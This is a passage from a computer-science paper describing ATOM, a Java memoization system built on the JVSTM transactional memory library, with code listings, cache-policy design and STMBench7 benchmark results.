subset may not be enough to obtain more than marginal improvements in performance. On the other hand, if we relax this prohibition, allowing methods that produce side-effects to be memoized, we extend the applicability of memoization to any method of an imperative system. The difficulty here is how to replicate the behavior of a memoized method that is not referentially transparent—that is, how to preserve the semantics of the program in the presence of memoized methods that may produce side-effects. 3. Software Transactional Memory The advent of multicore architectures highlighted the necessity for adequate parallel programming abstractions that help programmers build systems that take full advantage of the underlying hardware platform. That is the main motivation behind the work on Software Transactional Memory, which brought the expressiveness of transactions to mainstream programming, leaving behind the cumbersome work of explicit lock-based constructions. From the perspective of an STM, operations executed within a transaction do not have a special meaning associated with them: They are just a series of reads from and writes to shared memory locations. STMs intercept these accesses to shared memory and log into a per-transaction read-set what locations were read and into a per-transaction write-set what locations were written. Changes made during a transaction are made permanent only at the transaction’s end (commit time) and only when the transactional system can assure that there are no consistency violations. So, the commit of a transaction is responsible for detecting conflicts and can yield one of two possible results: - success—all of the values written by the transaction were applied to the shared system state. - fail—none of the values written were applied and the transaction should be restarted. Transactions can be decomposed into subtransactions, which, in turn, can be decomposed into more subtransactions, forming an arbitrarily deep hierarchy of nested transactions. A nested transaction is created every time a new transaction is started in the context of a surrounding transaction. The JVSTM [4] is a multi-versioned object-oriented STM implemented as a pure Java library that was conceived with read-dominated, domain-intensive applications in mind. The JVSTM introduces the concept of versioned boxes (VBox) to keep multiple versions of each shared mutable location. A VBox instance holds a sequence of values that corresponds to a successful assignment made to the box by a successfully committed transaction. Each element of this history is tagged with a version number that corresponds to the number of the transaction that made the change. To use the JVSTM, programmers need to transactify their programs. In Listing 2, we show the changes needed to make both the Client class and the Account class transactional. We replaced the Client’s accounts field with an instance of a transactional versioned set VSet, we encapsulated slot balance from the class Account inside a versioned box, and we made the getTotalBalance method atomic by using the @Atomic annotation. ```java class Account { VBox<Long> balance; } class Client { VSet<Account> accounts; @Atomic long getTotalBalance() { long total = 0; for (Account acc : accounts) { total += acc.balance.get(); } return total; } } ``` Listing 2. JVSTM-based implementation of the Client class and the Account class from the banking domain example. The bold-faced lines represent new code that was not present in the original implementation of both classes. The method get of a versioned box returns the current value stored in the box. The JVSTM makes a clear distinction between read-write transactions and read-only transactions. A transaction is read-write if it writes to at least one box, and read-only otherwise. Given that, in the JVSTM, read-only transactions never conflict, registering all the boxes that are read during the transaction in the transaction’s read-set is useless work. Thus, only read-write transactions keep a read-set. Because it is not possible to know beforehand a transaction’s nature, the JVSTM speculatively assumes that a transaction is read-only when it starts, revising this assumption as soon as the transaction tries to write to a box, in which case the transaction is restarted as a read-write transaction. 4. Extending the applicability of memoization As we saw in Section 2.1, to extend the applicability of memoization to object-oriented programs we need to address two main problems. First, we need to be able to capture all the relevant values for a method’s result, which typically include not only the values received as arguments, but also values belonging to the internal state of some objects. Second, we need to identify which methods have side-effects, so that we may choose either to not memoize them or to collect sufficient information to replicate correctly their behavior. We show in this section how we propose to use STMs to achieve both goals. 1 Source code available at http://web.ist.utl.pt/joao.cachopo/jvstm/ 4.1 Finding the relevant state To solve the problem of constructing the relevant state for a method’s result, we propose to use the support already provided by an STM: If a memoized method executes inside an STM transaction, then all of the memory read operations made by the execution of the method will be registered in the transaction’s read-set. Thus, at the end of the transaction we will know which values were read by the method, thereby capturing the relevant state for this particular method’s result. This approach has a second advantage. If we recall what was discussed in Section 2.1.1, to correctly handle relevant states, besides registering which values were read, we must be able to store in the cache information regarding the locations from where those values were retrieved from. Once again the underlying transactional system offers the solution for this problem. Because versioned boxes reify the concept of mutable locations, we can simply store in the cache all the instances of versioned boxes belonging to the read-set, knowing that a particular versioned box instance uniquely identifies a memory location and allows the memoization system to query its current content. Thus, by storing the read-set in the cache, the next time the memoized method is called we can check if each versioned box that belongs to the stored read-set preserves the same value as when the method originally executed. If so, there is a cache hit and the method’s execution is skipped. Otherwise, we must reexecute the method. 4.2 Identifying side-effects If we are trying to build an automatic memoization tool that is appropriate for imperative contexts, we must be aware that dealing with methods that are not referentially transparent is crucial not only for a successful memoization process, but more importantly, for determining the applicability of this optimization technique. Thus, we must adopt one of the two following approaches regarding side-effects: (1) offer the conventional semantics associated with memoization, not memoizing methods that produce side-effects, or (2) extend the concept of memoization to methods with side-effects. Obviously, the first approach is simpler to implement because we need only to identify methods with side-effects and prohibit memoization in such cases. Given that all methods are executing inside an STM transaction to capture the internal state dependencies, once the transaction finishes we may look at the transaction’s write-set to see whether the method wrote to any memory location; if it did, then we do not memoize this call; otherwise, we may memoize it as described before. A beneficial property of this approach is that we do not classify methods as a whole as producing side-effects or not. Rather, we identify whether a particular method execution produces side-effects or not, maximizing the possibility of using traditional memoization. Turning our attention now to the second approach identified above, to memoize a method that produces side-effects we need to reproduce its external behavior upon a cache hit. This external behavior includes replicating its return value, as it is done with referentially transparent methods, but also correctly changing all the memory locations that would be written if the method executed. Once more we may use the STM to obtain the intended behavior: Looking at the write-set, we may see which boxes were written and with what value. So, it is possible to memoize any method that produces memory side-effects if we store the write-set in the cache and in the future, after a cache hit, we iterate over the associated write-set and reapply all the changes as an additional step of the memoization process. 5. The ATOM system In this section we introduce the Automatic Transaction-Oriented Memoization (ATOM) system. The ATOM system implements the STM-based approach, described in Section 4, of using a transaction’s read-set to capture the relevant state for a particular result and the write-set to identify side-effect-free executions or to register possible write operations, so that it may apply them in future reexecutions of the same memoized method. 5.1 The ATOM API The ATOM system is implemented as a pure-Java library and, given that we tried to keep its interface as small and simple to use as possible, provides only a single interface for programmers—the @Memo annotation. Classes with methods that use this annotation are post-processed and rewritten, thus programmers just need to express their intention, as shown in Listing 3. The automatic transformation is done as a step of the compilation phase and uses the ASM [3] library for bytecode manipulation. ``` @Memo long getTotalBalance() {...} ``` Listing 3. Use of the annotation @Memo to memoize the method getTotalBalance. For each annotated method, the transformation process inserts in the class a new slot, named after the method to memoize, to hold an instance of a MemoCache. Because Java allows for method overload (several methods may have the same name as long as they differ from each other in terms of the type of the input arguments), to ensure the uniqueness of this name as well as an unambiguous relationship between the memoized method and its respective method cache, each inserted slot’s name is prefixed with “$cache,” and suffixed with the type of the arguments of the memoized method. If the annotated method is static the transformation process inserts a static slot to hold the memo cache. Then, each memoized method’s body is changed by adding a preamble that does a cache search complemented with the respective decision of whether to execute the method or not, and by preceding each return instruction with a call to the memo cache method that collects information regarding the execution. When this process ends, each new class definition is written over the original class file. Listing 4 shows the body of a memoized method after being transformed. As we can see, all the memoization behavior is implemented by the MemoCache class, which will be discussed in the next section. The decision to augment each memoized method with a memo cache relates to the fact that, most often, the receiver of the message (the instance on which the method is being invoked on) influences the outcome of the method. Thus, by spreading the cache by all of the objects of a class, rather than having a single cache for all of them, naturally partitions the cache and simplifies its maintenance, because when an object is garbage-collected, so is the portion of the cache that belongs to it. 5.2 The MemoCache class The MemoCache class, shown in skeletal form in Listing 5, implements the memoization strategy described in Section 4. Each in- --- 2 Source code available at http://web.ist.utl.pt/hugo.rito/ 3 The @Memo annotation provides also the same semantics of the @Atomic annotation, and, thus, replaces it. class Client { VSet<Account> accounts; MemoCache $cache_getTotalBalance; @Atomic long getTotalBalance() { Object[] args = new Object[]; Object res = $cache_getTotalBalance.search(args); if (res != MemoCache.notFound) return res; long total = 0; for (Account acc : accounts) { total += acc.balance.get(); } $cache_getTotalBalance.collectInformation(args, total); return total; } } Listing 4. The memoized version of method getTotalBalance. The changes done by the ATOM are highlighted in boldface. The memo cache (Figure 1) is organized in two levels: The first level is composed of all the information available at call time—the arguments supplied to the memoized method—and maps to a second level which holds information observable only after the method executes—that is, the captured read-set, the returned result, and, possibly, a write-set. 5.3 Implementation of the memoization cache The memo cache (Figure 1) is organized in two levels: The first level is composed of all the information available at call time—the arguments supplied to the memoized method—and maps to a second level which holds information observable only after the method executes—that is, the captured read-set, the returned result, and, possibly, a write-set. Because the JVSTM is a multi-versioned STM, we may have concurrent threads executing in different versions of the system. So, to maximize the probability of a cache hit, we allow threads that are executing in a more recent state of the system to update the memo cache without overriding entries that may be useful for lagging transactions. Thus, the second level of the memo cache contains not one but a fixed-sized array of entries. Given that, in general, it is not possible to determine the maximum number of concurrent threads, we limit the size of the array to the number of available processors. A cache search begins with a table lookup on the first level of the MemoCache, using the list of arguments supplied to the memoized method. Once we obtain a second level array, the search algorithm iterates over all the second level entries looking for a valid read-set, starting with the most recently added one. Intuitively, a read-set is valid if and only if all the boxes in it still hold the same value as when the read-set was stored in the cache. To see whether a box still has the same value as before, the ATOM system offers three caching policies: version, value, and identity. The version caching policy considers that a box still has the same value if and only if it is still in the same version (meaning that no write occurred to this box). It is theoretically the fastest of the three caching policies because it just needs to do a simple integer equality test to check if one entry of the relevant state is still valid, but may lead to less hits: from the moment one box changes value, any cache entry that depends on that particular box will forever be invalid. It is also the policy that consumes less memory, because it saves only the versioned boxes read by the memoized method, not caching the values that were read. The value caching policy checks whether the current value of the box, regardless of its version, is equal to the value seen before. This second policy type may lead to more hits than the previous because it allows a box to change value and still maintain cache entries valid, provided that when the cache entries are checked, the box has the same value as it did when the entries were created. It is also the only cache policy that gives programmers the opportunity to control the validation process by defining their own custom implementation of the method equals, which is used to compare cached values. The drawbacks of this cache policy are that it assumes that the method equals is correctly defined for the values stored in the boxes and that its time complexity depends on the complexity of such method. The identity caching policy checks whether each cached versioned box references the same object in memory as the value that was read—that is, if both objects are "=="-equal. If so, then the entry is still valid. This last policy offers not only conventional semantics used in reference models to compare values for equality, but also constitutes an interesting compromise between the other two caching policies: a simple and fast comparison test that allows a box to change value and still maintain cache entries valid. The decision to implement three caching policies was made to offer programmers an opportunity to choose which equality policy adapts better to the situation—that is, which will translate to a better performance. The memoization system allows this choice to be made on a per-method basis, placing no restrictions on the caching policy used for a particular method. 5.4 Memoization strategy The addition of new cache entries complies with the semantics defined in Section 4—that is, programmers can opt either to memoize executions that produce side-effects, or not. Hence the MemoCache implements two memoization strategies: read-only and write-allowed. The read-only memoization strategy follows the traditional memoization behavior of disallowing executions with side-effects to be memoized, whereas the write-allowed memoization strategy caches any method execution, saving the write-set and reapplying it after a cache hit. 5.5 Parameterizing @Memo annotations Given that the ATOM system allows for three types of comparison policies and also two memoization strategies, the @Memo annotation may be parameterized to inform the transformation process what is the combination of caching policy and memoization strategy that the programmer intends to use in the annotated method. We finally present, in Listing 6, the detailed implementation of the @Memo annotation. ```java @Retention(RetentionPolicy.CLASS) @Target(ElementType.METHOD) public @interface Memo { CachePolicyType type() default CachePolicyType.VERSION; MemoStrategy strategy() default MemoStrategy.READONLY; } ``` Listing 6. Implementation of the @Memo annotation. The attribute type accepts three possible values—VERSION, VALUE, and IDENTITY—and defines how the cache will compare values for equality—using the version of the box, the value of the box, or the object referenced, respectively. On the other hand, the attribute strategy controls how side-effects are handled by the memoization system. If parameterized with READONLY, any method execution that writes will not be memoized, whereas with WRITEALLOWED all calls to the memoized method will be cached, regardless of whether they produced memory side-effects or not, and the side-effects will be reapplied in future cache-hits, if necessary. Both parameters are optional and, by default, the instrumentation tool inserts in @Memo annotated methods a read-only cache that uses the version of the box to decide if the value that it holds is still valid. 5.6 Improving cache searches The complexity of the read-set validation algorithm grows linearly with the number of boxes that need to be validated and depends on the cache policy chosen. Thus, it is a potential bottleneck of the system that we would like to optimize. One way to do so is by validating a read-set only when it is strictly necessary. In a program that uses the JVSTM, the system evolves through discrete states that are tagged with the number of the transaction that committed and created the state. Combining this fact with the observation that a read-set is known to be valid at creation time and after a successful search, we decided to augment each second level entry of the cache with a list of valid states where we store all the system states for which the read-set is valid. This way, before validating a read-set, we first check whether the current transaction’s number is stored in the log. If so, we return the cached result, if not we validate the read-set as usual and, if the read-set is indeed valid, we add the current transaction’s number to the log. 5.7 Memory management in the MemoCache To control memory consumption, the MemoCache adopts two distinct approaches, one for each level of the method cache. The first level uses weak references to hold the values of the map—that is, second level entries are only weakly referenced. Using weak references helps controlling the amount of memory used by the method cache because, as specified in the Java memory model [9], weak references, unlike strong ones, do not prevent their referents from being made finalizable, finalized, and then reclaimed by the garbage collector (GC). Hence, if at a certain point in time the GC algorithm decides that it needs to free some memory, entries in the cache will be dropped, without affecting cache semantics. On the other hand, the second level of the cache, as mentioned before in Section 5.3, relies on a fixed-size number of entries, equal to the number of available processors, with a simple round-robin policy. If a memoized method m1 calls another memoized method m2, m2’s relevant state contains the nested transaction’s read-set, whereas m1’s relevant state contains both the boxes read by m1 and by m2. If we store both relevant states in the cache, m1’s cache entry will contain a subset of boxes that correspond to an entry in m2’s cache. This replication of information is undesirable considering that read-sets are usually very large. Thus, we decided to use the runtime call hierarchy of memoized methods to compose second level cache entries. Each cache entry now stores only the boxes that are locally read by a method and has a list of other cache entries that correspond to all memoized methods that were called by the current method. With this new approach, m2’s relevant state remains the same, but m1’s relevant state now contains only the boxes read by m1 plus a reference to the relevant state of m2. 5.8 The memoization advisory system As discussed in Section 2, memoization results in a performance boost only when it is faster to search the cache for a match than to reexecute the original method, and, of course, there is a cache hit. From this observation comes a crucial conclusion: Memoization may deteriorate the performance of the system if programmers memoize methods that never execute under the same state or that take less time to execute than the time it takes the memoization system to search the cache. Although fundamental, the task of maximizing system performance is difficult, error-prone, and arduous if accomplished by code inspection alone or by reasoning about the intended system behavior. This problem becomes even more complex in the case of the ATOM system because programmers need to worry not only about which methods are beneficial to memoize, but also which memoization strategy and comparison policy is the best to use for each method. To simplify the whole selection process, we introduced the TestMemoCache class. This new type of method cache subclasses the original MemoCache and is designed to collect per-memoized-method information. Unlike the conventional MemoCache that enforces a single memoization strategy and a single cache policy, the TestMemoCache is in fact composed of six independent MemoCache instances, one for each possible combination of memoization strategy and cache policy. Thereby, upon a search request, the TestMemoCache queries each of its private MemoCache instances for a hit, collecting information about the time each took to issue a response and if the response was a cache hit or a cache miss. Each of the six searches is done inside a transaction that is aborted as soon as the TestMemoCache collects enough information about the request. This extra work is necessary to correctly recreate the execution scenario where only one cache is used. In particular it prevents side-effects done by write-allowed caches to influence the outcome of subsequent searches and computations. Independently of any combination of responses given by each of the six individual caches, a search request made to the TestMemoCache results always in a cache miss, to force the execution of the original body of the memoized method. This way, the TestMemoCache can collect the time it would take the normal version of the code to execute and compare it with the various memoized solutions. It is important to note that the time a memoized method takes to complete is equal to the time spent on the cache search, if there is a cache hit, or is equal to that time plus the time spent on executing the method’s original body and on creating the new cache entry, if the cache yielded a miss. The runtime information collected by the TestMemoCache is then saved to the file system and used as input to the MemoAdvisor class, responsible for calculating the total number of cache hits and cache misses, average execution time, and expected speedup over the unmemoized version, for each combination of cache strategy and comparison policy. This overall information is presented to the programmer divided in two sections: methods where it is expected that memoization can accelerate their execution and those that do not. The advisory system complements such information with which combination of memoization strategy and caching policy type is best suited for each memoized method. It is then up to the programmer the task of choosing the final configuration of the system. Listing 7 shows a possible output for the MemoAdvisor with two memoized methods. Only expected average times are shown. 5.9 Extending JVSTM transactions Our memoization implementation depends crucially on the support offered by the transactional system. More specifically, on the ability to obtain from the JVSTM the read-set and the write-set, as well as the guarantee that all memory accesses are correctly registered in the respective set. But the JVSTM was not designed with memoization in mind. For example, the JVSTM uses read-only transactions as a way to eliminate the overheads of logging memory accesses when they are not relevant, whereas in the ATOM system all memory accesses are relevant, even for read-only methods. Thus, we decided to extend the already available transactions with a new type of transaction—the MemoTransaction. This choice allowed us to implement memoization-specific semantics and optimizations. Going back to the example given above, to keep all benefits of read-only transactions and still allow correct memoization we created read-only memo transactions that log to the read-set only when executing inside a memoized method. In concurrent environments, multiple threads may execute concurrently and STMs use the write-set as a buffer for the changes that a transaction wishes to do. These changes will be applied if the transactional system can guarantee that the committing transaction does not conflict with a previously committed one. In this validation process, the read-set is used to ensure that the committing transaction did not read a transactional location that another already committed transaction wrote. Hence, even in the simpler case where we memoize a read-only method, there are side-effects that may change the semantics of the program: All transactional methods write to the transaction’s read-set. Thus, to replicate the behavior of a memoized transactional method, besides replacing the method call with the cached result, and possibly applying the cached changes, the memoization system needs to populate the transaction’s read-set with the versioned boxes that would be read by the method if it executed normally. One observation made during early tests with the ATOM system was that it spent too much time populating the read-set to ensure correct transactional semantics and that this action was negatively influencing the performance of the memoization system, especially for methods that read a large number of versioned boxes. Given that the information registered in the read-set is necessary only if at commit time the transaction is read-write—the JVSTM’s validation task first looks at the transaction’s write-set and it uses the read-set only if the write-set is non-empty—we improved the performance of the memoization system by not populating the read-set when it is known to be not necessary. For example, we may skip the population step after a cache hit on a top-level, read-only, memoized method, because top-level read-only transactions never fail. The problem is that, after a cache hit on a memoized method executing inside a nested transaction, populating the read-set is unnecessary only if the nested transaction is read-only, its parents are read-only, and other nested transactions that may execute in the context of this transaction are also read-only. Thus, when a nested transaction commits it is not possible to know in advance if the read-set will be necessary in the future, or not. Because the conservative approach of populating the read-set when a memoized nested transaction commits is very inefficient, even more inefficient in read-dominated contexts where the frequency of read-write transactions is low, the ATOM system enforces a speculative read-only policy on memoized methods. Upon a cache hit, a promise is added to the running memo transaction regarding the values that would be added to the read-set. This promise is realized immediately if the transaction is already read-write. Otherwise, it is delayed until a future nested transaction tries to write to a box. 6. Evaluation To evaluate the usefulness of memoization in object-oriented programs we tested the ATOM system with the STMBench7 benchmark. The data structure of the STMBench7 benchmark is similar to those used by CAD programs and consists of a set of graphs and indexes that are shared and are concurrently accessed by a configurable number of threads. We extended the default implementation of the benchmark, which is lock-based, with a new version that uses the JVSTM. The JVSTM version encapsulates each mutable field of design-library objects inside a versioned box, uses versioned box operations to access the fields, and executes each operation of the benchmark inside a transaction. In our test with the ATOM we replaced the JVSTM transactions with ATOM memo transactions. Additionally, we created a version of the benchmark, from now on referred as “Plain”, that is the default implementation of the benchmark minus all the locks. The Plain version does not use the JVSTM and was used solely to assess the overheads of using an STM on sequential, single-threaded programs. In total, the STMBench7 benchmark implements 45 distinct operations. These operations are classified according to their category and their type. In the original benchmark, we can disable all the long traversals, all the structure modification operations, or both. We extended it to allow us to disable only the read-write long traversals, leaving active the read-only long traversals. The benchmark executes an operation by calling the method performOperation, that either reads or updates the design-object graph, depending on the operation instance on which this method is invoked on. We decided to memoize only the various implementations of the method performOperation because that is where we believe memoization will yield the best performance boost. Unfortunately, many implementations of the method performOperation use random numbers to, for example, index the design-object graph. Thus, we had extra care to memoize deterministic methods only, which led, for example, to not being able to memoize structure modification operations. To select which methods to memoize, we made a first run of the benchmark with all of the 14 remaining operations annotated with the Memo annotation and using the TestMemoCache. This preliminary test run for 120 seconds with all long read-write traver- The machine used for these tests can run up to 8 real threads or 16 logical threads with hyperthreading. Normal READONLY_IDENTITY The results for the read-write and write-dominated workload can be found in [12]. <table> <thead> <tr> <th>Query7.performOperation()</th> <th>Memo Time</th> <th>Normal Time</th> <th># of Hits</th> <th># of Misses</th> <th>SpeedUp</th> </tr> </thead> <tbody> <tr> <td>WRITEALLOWED_VERSION</td> <td>561221</td> <td>8827988</td> <td>47</td> <td>1</td> <td>15.83</td> </tr> <tr> <td>WRITEALLOWED_VALUE</td> <td>558751</td> <td>8827988</td> <td>47</td> <td>1</td> <td>15.83</td> </tr> <tr> <td>WRITEALLOWED_IDENTITY</td> <td>558458</td> <td>8827988</td> <td>47</td> <td>1</td> <td>15.83</td> </tr> <tr> <td>READONLY_VERSION</td> <td>558149</td> <td>8827988</td> <td>47</td> <td>1</td> <td>15.83</td> </tr> <tr> <td>READONLY_VALUE</td> <td>558015</td> <td>8827988</td> <td>47</td> <td>1</td> <td>15.83</td> </tr> <tr> <td>READONLY_IDENTITY</td> <td>557800</td> <td>8827988</td> <td>47</td> <td>1</td> <td>15.83</td> </tr> </tbody> </table> <table> <thead> <tr> <th>ShortTraversal6.traverse(lstbench7/core/AtomicPart);</th> <th>Memo Time</th> <th>Normal Time</th> <th># of Hits</th> <th># of Misses</th> </tr> </thead> <tbody> <tr> <td>WRITEALLOWED_VERSION</td> <td>145072</td> <td>125019</td> <td>0</td> <td>104</td> </tr> <tr> <td>WRITEALLOWED_VALUE</td> <td>137762</td> <td>125019</td> <td>0</td> <td>104</td> </tr> <tr> <td>WRITEALLOWED_IDENTITY</td> <td>136493</td> <td>125019</td> <td>0</td> <td>104</td> </tr> <tr> <td>READONLY_VERSION</td> <td>127957</td> <td>125019</td> <td>0</td> <td>104</td> </tr> <tr> <td>READONLY_VALUE</td> <td>127917</td> <td>125019</td> <td>0</td> <td>104</td> </tr> <tr> <td>READONLY_IDENTITY</td> <td>127873</td> <td>125019</td> <td>0</td> <td>104</td> </tr> </tbody> </table> Listing 7. Output of the MemoAdvisor with two methods of the STMBenchmark7 benchmark memoized. The time is in nanoseconds. sals and structural modifications disabled, under a read-dominated workload. We then decided to memoize all the operations that, on average, executed faster when memoized. Therefore, we memoized the operations Query2, Query5, Query6, Query7, ShortTraversal19, Traversal1, Traversal8, and Traversal9. We present results for a read-dominated workload and with three possible mixes of operations: (1) all operations except long read-write traversals and structural modifications, (2) all operations except long traversals (both read-write and read-only), and (3) all operations except long traversals and structural modifications. We ran each test five times, removed both the best and the worst throughput values, and averaged the three remaining throughput values. All tests ran for 120 seconds using 1, 2, 4, 8, and 16 threads in a Dual-Quadcore Intel Nehalem-based Xeon E5520, with 12Gb of RAM running Ubuntu Linux 9.04, and Java SE version 1.6.0.16. While the test ran, no other relevant processes were executing in the system. 6.1 Comparing the JVSTM and the ATOM We show the STMBenchmark7 benchmark throughput results obtained for the various mixes of operations and a read-dominated workload with the JVSTM and with the ATOM in Figure 2. These results show a clear increase in performance when using memoization. The memoized version performs better than the JVSTM in almost all scenarios, achieving the best results in the first mix of operations (shown in the leftmost graph of Figure 2), where the throughput of the system increases by a factor of 14. The first mix of operations includes long read-only traversals, which are the most computationally intensive operations in the benchmark—the maximum time to completion of long traversals is over half a second, whereas for the remaining operations is below 9 milliseconds. So, it makes sense that memoization gives the best results for long-traversals. For the second mix of operations, as we can see in the second graph of Figure 2, for 1, 2, or 4 threads memoization continues to behave better or at least as good as the JVSTM with speculative read-only transactions. The same cannot be said for 8 or 16 threads. To understand these results it is important to remember that in this second mix of operations we turned on all structural modifications. So, the state of the system is constantly changing, reducing the number of cache hits. Further, more cache misses translate directly to more operations that are not skipped and, thus, concurrently add new cache entries, generating contention in the cache. This problem with operations that change the structure of the design-object graph, is confirmed by the third mix of operations. We disabled once again all structural modifications and, as we can see, the ATOM outperforms the standard solution, demonstrating clear advantages of using memoization even for operations that are not computationally demanding. With the second mix of operations, we can see a reduction in performance for both the JVSTM and the ATOM, with 16 threads. This result is typical of the STMBenchmark7 when we have more threads than available processors, because the number of conflicts rises and so do the number of restarted transactions. Overall, our solution scales well and, given that the STMBenchmark7 benchmark traverses the object graph but performs no operations on the leaves, it is reasonable to expect better results under a more realistic test because the unmemoized version of the system would take longer to complete each operation. 6.2 The STMBenchmark7 Plain version Because memoization is to be used also in single-threaded environments, where the introduction of an STM is semantically irrelevant but computationally heavy, it is important to assess if the overhead imposed by the usage of a software transactional memory to capture internal state accesses is high enough to negate the performance benefits extractable from memoization. We show in Table 1 the throughput results for a read-dominated workload and the various operations mixes in a single-threaded environment with the Plain, the JVSTM, and the ATOM versions of the benchmark. As we can observe, using the JVSTM in single-threaded programs results always in a degradation of performance. At best, the JVSTM version of the benchmark processes half the operations per second, when compared with the non-transactional version. Hence, even though in a single-threaded environment transactions never conflict or abort, STMs introduce a significant overhead that discourages their use. The same cannot be said about the ATOM version of the benchmark: In the scenario with long read-only traversals, the ATOM is by far the best approach, improving the performance of the Plain The machine used for these tests can run up to 8 real threads or 16 logical threads with hyperthreading. version by a factor of 7. This result is even more expressive considering that even for single-threaded environments, the ATOM ensures that the memo cache is accessed in mutual exclusion and read-sets and write-sets are correctly populated and validated. As expected, in the last two mixes of operations, where the amount of read-only expensive operations is low or the system state is constantly changing, the ATOM performs worse than the non-transactional version, but even on these scenarios, the ATOM outperforms the JVSTM. Thus, we argue that memoization can be very useful in transactional systems as a way to reduce the overheads imposed by STMs, thereby promoting their adoption. Memoizing methods called inside a transaction may accelerate future executions of the transaction and even reexecutions of the same transaction if the transaction conflicts and then restarts. Overall, we can conclude that when there are computationally expensive repeated read-only operations, the performance boost we obtain from using the ATOM is enough to compensate not only the time spent on cache operations, but also the overheads imposed by the use of an STM. 7. Related work Memoization has been the subject of investigation since it was first introduced in 1968. Over the years, many automatic memoization systems were introduced for programming languages such as LISP [8] or C++ [10]. Compared to previous implementations of memoization, our solution is the first automatic memoization system that allows internal state dependencies, that validates choices made by the programmers, and that incorporates memory side-effects within the memoization process. Incremental computation is a technique that captures the runtime behavior of a function and then adapts its future outputs by recomputing only the parts of the computation that changed. This is accomplished using dependence graphs [1, 5] to capture the data dependencies of computations and by finding the parts of the graph that change between function calls. Although promising, it is a work that still needs to mature. Its current formulation does not deal with concurrent systems and still lacks a mainstream language implementation. Our approach detects at runtime if a method produces side-effects. Another solution would be to do this classification statically at source code level as proposed by Franke et al. [6] or Rountev [13]. Static solutions have the advantage of introducing no runtime overheads, which is essential to obtain the best speedup possible. The biggest problem with static analysis is that they are conservative: a method is classified as not cacheable when there is, at least, one path of execution where it may cause side-effects. Xu et al. [15] also applied memoization to Java programs. They dynamically identify methods that are safe to memoize using a solution based on escape analysis and Java bytecode inspection. In their work, memoized methods may do heap reads as long as the retrieved values are reachable from the supplied arguments. They allow such behavior by “flattening” reference arguments—recursively gathering object type and primitive field values for all reachable types—and by incorporating such information in the cache-key. Such solution does not solve entirely the problem of internal state reads because it does not account for reads of static fields or instance fields that influence the outcome of the method, and were not received as input. For example, in the scenario described in Section 2.1.1, and implemented in Listing 1, their solution would still fail to register the appropriate relevant state. Our solution combines memoization with STMs, but Ziarek and Jagannathan [16] were the first to apply memoization in transactional environments. The aim of their work was to use memoization to prevent the reexecution of operations that do not conflict in transactional environments, as a way to accelerate forced reexecutions and not as way to speedup repeated operations, as we propose. Another difference between both works is that Ziarek and Jagannathan’s memoization system assumes that a method’s result depends solely on the list of arguments, not capturing internal state dependencies. <table> <thead> <tr> <th>Version of the Benchmark</th> <th>Plain</th> <th>JVSTM</th> <th>ATOM</th> </tr> </thead> <tbody> <tr> <td>No read-write traversals / No structural modifications</td> <td>154</td> <td>79 (0.51)</td> <td>1131 (7.34)</td> </tr> <tr> <td>No traversals</td> <td>6291</td> <td>2311 (0.37)</td> <td>3186 (0.51)</td> </tr> <tr> <td>No traversals / No structural modifications</td> <td>7719</td> <td>3460 (0.45)</td> <td>6564 (0.85)</td> </tr> </tbody> </table> Table 1. Operations per second processed by the Plain, the JVSTM, and the ATOM versions of the benchmark, for a read-dominated workload under the three different mixes of operations and one thread. In parentheses is shown the speedup relative to the Plain version. 8. Conclusion The main goal of our work was to make memoization more appealing and appropriate to the unique characteristics of object-oriented programs. In particular, we identified the difficulty of constructing the list of relevant values for the output of a method, when this list includes the arguments of the method as well as values read from the internal state of some objects, as the major obstacle to using memoization in object-oriented systems. The fact that methods may also change the state of objects, i.e., produce memory side-effects, is an additional factor that hinders and influences the applicability of memoization in object-oriented programs. In this paper we proposed to use Software Transactional Memory to extend the applicability of memoization. Our solution is to wrap methods in transactions to obtain all the information that is needed for memoization. We described an automatic memoization tool—the ATOM system—that implements our extended memoization model for object-oriented programs in a flexible and easy-to-use way, requiring minimum knowledge from programmers. The ATOM system captures automatically the relevant state for a memoized method’s result, identifies side-effect-free methods that are safe to memoize, and captures memory write operations to the internal state of objects so that they can be reapplied in future reexecutions of the method, thus extending memoization even to methods that are not referentially transparent. We developed a memoization advisory tool that aids programmers to find the methods that can benefit from memoization. Because the ATOM system offers three caching policies and a couple of memoization strategies, the advisory tool not only lists methods that memoization can accelerate, but also what is the best combination of caching policy and memoization strategy to use, in a per-method basis. For now, the selection of memo methods requires programmers to memoize all the methods of the system, or at least those that they expect will execute repeated work, and then run some representative portion of the use cases of the application. In the future we intend to automate the selection process and even allow the ATOM system, at runtime, to turn on/off memoization in methods, adapting the system to its current workload. We can conclude from our tests that as long as there are read-only repeated operations, the ATOM system is able to improve the performance of the underlying system in a transparent, simple, and flexible way. We have shown as well that, regardless of whether, as a whole, the system is functionally pure or not, programmers can expect the same behavior and beneficial characteristics of memoization in object-oriented contexts if they adopt our STM-based solution. Because STMs already do all of the expensive work of collecting the relevant information for the memoization tool, this extended memoization approach comes for free for a system that already uses an STM. Moreover, because it increases the performance of the system at almost no extra cost, it amortizes the upfront cost of using an STM, thereby promoting the adoption of STMs. We strongly believe that STMs have much to gain from memoization and we intend to explore such synergy in the future. For once, memoization can be used to accelerate the reexecution of transactions that abort at the validation step. In fact, this comes for free if all transactions are memoized and may even allow transactions that will conflict to reach the validation step faster. Second, because memoization gives a different end to the information already being generated by STMs, it lowers the perceived cost of constructing it in the first place. Because the effectiveness of the ATOM system is strongly correlated with the time spent on cache operations, we intend to experiment in future work with different cache strategies. In particular, we will explore an alternative to the read-set validation algorithm that, instead of asserting if each versioned box contained in the cache is still valid, relies on an invalidation protocol that automatically removes from the cache all entries that are made invalid by a successful write to a versioned box. Acknowledgments We wish to thank the reviewers for all the insightful comments, which have helped us to improve the final version of the paper. References
